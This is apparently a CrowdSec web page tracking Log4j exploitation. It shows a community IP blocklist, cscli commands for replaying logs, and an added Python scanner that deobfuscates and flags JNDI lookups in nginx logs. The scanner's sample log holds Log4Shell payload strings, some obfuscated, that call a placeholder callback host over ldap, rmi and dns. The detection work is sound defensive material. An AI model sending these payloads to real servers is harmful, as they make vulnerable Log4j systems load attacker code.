Live Log4J - The open-source & collaborative IPS

Live Log4J threat tracker

This report includes real-time data reported by the CrowdSec Community. IPs originating from known public scanners are discarded from this report (mostly IPs from Germany) but are included in our full IP list available in this Gist.

Join the CrowdSec community and start reporting & remediating rogue IPs scanning for the Log4j vulnerabilities and many more. Get it here!

CrowdSec helps detect and mitigate Log4j exploits

The Log4j vulnerability impacts countless organizations. CrowdSec released a scenario that helps detect and block exploitation attempts against this vulnerability. The new scenario can be downloaded directly from our Hub and installed in the blink of an eye. Check this quick video to see it in action:

As CrowdSec is all about crowd power and given the size of our quickly growing network, we are collecting a lot of IP addresses attempting to exploit this vulnerability. You can check the list here. It is updated several times a day and, needless to say, you should block the ones that are “validated”.

Those IP addresses were curated by our consensus algorithm, meaning they received a lot of votes against them from our user network. The ones in the “not enough data” state are highly suspicious but may still contain some false positives; whether to block them is up to you. The ones categorized as “benign” are IPs used by people who are usually on the good side of the fence: they probably scan to help, not to undermine.

Alternatively, you can use our replay mode to analyze your servers’ logs and check whether exploitation of Log4j was attempted against you, by whom and when, using the appropriate scenario and the command lines below:

sudo cscli hub update
sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec

# sudo crowdsec --dsn "file://<log_file_path>" -no-api --type <log_type>
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx

sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228
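To make concrete what a replay over an access log is looking for, here is a small added example (written for this page, not CrowdSec's scenario or any of its code) that parses nginx combined-format lines, collapses the lookup-obfuscation tricks Log4j accepts (${lower:...}, ${upper:...}, ${...:-literal} and URL encoding), and flags any request path, referer or user-agent that resolves to a JNDI lookup, then tallies the offending IPs much like the alert listing above. It goes slightly beyond the page by handling the nested-lookup variants as well as the plain string. The log lines, IP addresses and hostnames are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access-log lines (combined format). IPs are from
# documentation ranges and the callback hostname is a placeholder.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:22:14:03 +0000] "GET /${jndi:ldap://callback.example/a} HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2021:22:15:11 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:r}mi://callback.example/x}"
192.0.2.44 - - [10/Dec/2021:22:16:40 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "curl/7.68.0"
203.0.113.7 - - [10/Dec/2021:22:17:02 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fcallback.example%7D HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""

# nginx "combined" format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S*) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Innermost ${...} lookup, i.e. one whose body contains no further braces.
LOOKUP_RE = re.compile(r'\$\{(?P<body>[^${}]*)\}')

# The thing we ultimately want to see once obfuscation is stripped away.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def _resolve(m):
    """Replace one innermost lookup with the literal text Log4j would substitute."""
    body = m.group('body')
    if body.lower().startswith('jndi:'):
        return m.group(0)                      # keep the lookup itself intact for the detector
    if ':-' in body:                           # default-value syntax: ${anything:-literal}
        return body.split(':-', 1)[1]
    if body.startswith('lower:'):
        return body[len('lower:'):].lower()
    if body.startswith('upper:'):
        return body[len('upper:'):].upper()
    return m.group(0)                          # unknown lookup: leave as-is


def normalize(text, max_rounds=10):
    """URL-decode and resolve nested lookups innermost-first until nothing changes."""
    for _ in range(max_rounds):
        text = unquote(text)
        new = LOOKUP_RE.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_log(text):
    """Return one finding per log line whose path, referer or user-agent carries a JNDI lookup."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ('path', 'referer', 'ua'):
            payload = normalize(m.group(field))
            if JNDI_RE.search(payload):
                findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                                 'field': field, 'payload': payload})
                break                          # one finding per line is enough
    return findings


def offenders(findings):
    """Count findings per source IP, the shape a ban decision is usually made on."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']}  {h['ip']:<15} {h['field']:<8} {h['payload']}")
    print('per-IP counts:', offenders(hits))
```

The deobfuscation step matters: a detector that only greps for the literal string misses the second and fourth lines, which is exactly why a scenario rather than a one-line grep is the right tool for a replay.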

Join the crowd

Cybercriminals constantly collaborate, on a world scale. Each IP they control is an anonymity token that hides their hacktivities. Our only chance is to stand as a crowd and act in a coordinated way, as they do. When you, Sysadmins, Devops & Secops, join forces, you outnumber them and can burn their IPs one by one, crippling this precious anonymity.

  • 2.5M rogue IPs detected

  • 5.1k stars on GitHub

  • 158 countries